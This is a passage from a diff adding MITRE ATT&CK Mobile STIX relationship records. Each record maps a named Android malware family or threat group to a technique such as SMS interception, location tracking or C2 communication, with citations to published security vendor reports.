"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:41:16.423Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve call history.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--36268322-9f5e-4749-8760-6430178a3d68", + "created": "2020-06-26T14:55:13.311Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:08.956Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can intercept SMS messages.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--35927c96-7645-4ef3-b3da-e44822386a10", + "created": "2023-01-18T21:43:10.838Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:47:19.403Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) contains domain generation algorithms to use as backups in case the hardcoded C2 domains are unavailable.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d1318f71-7f70-4820-a3fc-0d05af038733", + "created": "2021-10-01T14:42:49.154Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can perform actions when one of two hardcoded magic SMS strings is received.(Citation: SecureList BusyGasper)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5977289e-d38f-4974-912b-2151fc00c850", + "type": "relationship", + "created": "2020-11-20T16:37:28.524Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.524Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect the device’s phone number and IMSI.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--afe9e326-01f7-4296-a11b-09cfffd80120", + "type": "relationship", + "created": "2020-07-27T14:14:56.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-10T22:18:20.747Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can simulate user clicks on ads and system prompts to create new Google accounts.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c6241ba3-e0f9-48a7-9ed7-a5544a090081", + "type": "relationship", + "created": "2019-09-04T14:28:16.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.856Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can track the device's location.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0f7e7c29-43f0-4aff-ae83-dfff331915ef", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "modified": "2019-10-10T15:24:09.248Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) collects the device's location.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--98ae9cb2-1141-48c6-81fd-f16adb430031", + "created": "2023-01-18T19:17:07.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:07:52.850Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can request the `READ_EXTERNAL_STORAGE` and `WRITE_EXTERNAL_STORAGE` Android permissions.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22f5308c-77ee-4198-be1c-54062aa6a613", + "created": "2020-12-31T18:25:05.160Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:00:13.616Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has used HTTPS for C2 communication.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--74c3c88c-956b-4bc7-9ea2-585e7366fe69", + "created": "2020-04-08T15:51:25.078Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ginp](https://attack.mitre.org/software/S0423) can use a multi-step phishing overlay to capture banking credentials and then credit card numbers after login.(Citation: ThreatFabric Ginp)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc82546-f4da-4f47-88ec-b215edb1d695", + "type": "relationship", + "created": "2021-02-08T16:36:20.799Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.589Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included malware functionality capable of downloading new DEX files at runtime during Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e34c8c23-be8f-4da9-b051-5246e5f16ba8", + "created": "2023-03-01T22:18:19.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:14:48.174Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can send contact lists to its C2 server.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e", + "created": "2022-03-30T19:29:07.379Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Inform users that device rooting or granting unnecessary access to the accessibility service presents security risks that could be taken advantage of without their knowledge.", + "modified": "2022-03-30T19:29:07.379Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--55afe9a0-d261-48ea-b5a8-0b1685ff2f15", + "type": "relationship", + "created": "2020-04-24T15:06:33.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.319Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect voice notes, device accounts, and gallery images.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c4e73a6c-d523-4f3c-bcb6-200f63867fb4", + "type": "relationship", + "created": "2020-09-11T15:57:37.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:57:37.770Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can delete SMS messages.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c9c22e0d-c427-42ef-ae76-beb8ae9f6bf2", + "created": "2020-09-15T15:18:12.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:58:31.945Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect the device’s network information.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ca4eb452-4a2f-41d7-a015-81f43e96737e", + "type": "relationship", + "created": "2019-09-23T13:36:08.386Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-09-23T13:36:08.386Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) collects the device's IMEI and sends it to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d09a4d42-45bd-4b2a-aef4-3aa3982115ad", + "created": "2022-04-05T19:45:03.117Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:45:03.117Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--abf3b5c8-9ee5-42ff-ba94-2b3a15317783", + "created": "2023-03-20T18:55:51.580Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:51.580Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--22f3d28b-ba0c-4aa3-99b4-60790ba9c7b6", + "type": "relationship", + "created": "2021-01-05T20:16:20.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.484Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can track the device’s location.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4761145d-34ac-4b45-a0d6-a09b1907a196", + "type": "relationship", + "created": "2020-12-18T20:14:47.367Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.367Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can inject clicks to launch applications, share posts on social media, and interact with WebViews to perform fraudulent actions.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4019493-bd52-4011-9355-8902be6ff3f3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:19.083Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) registers the broadcast receiver to listen for events related to device boot-up.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--70367e5c-15e0-4bcd-b538-7a90c4eefd30", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:35.443Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) maintains persistence by installing an Android application package (APK) on the system partition.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d1e11627-23e4-40f3-bcbc-2b832b0bbaa3", + "created": "2023-02-28T20:31:31.983Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:31:31.983Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can intercept SMS messages and USSD messages from Telcom operators.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4e4c3ae-4c4d-4eba-8330-022464cbf828", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:12.082Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests SMS and MMS messages from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--95bf4e8b-f388-48a0-b236-c2077252e71e", + "type": "relationship", + "created": "2019-09-03T20:08:00.757Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-09-15T15:35:33.380Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) gathers the device IMEI to send to the command and control server.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": 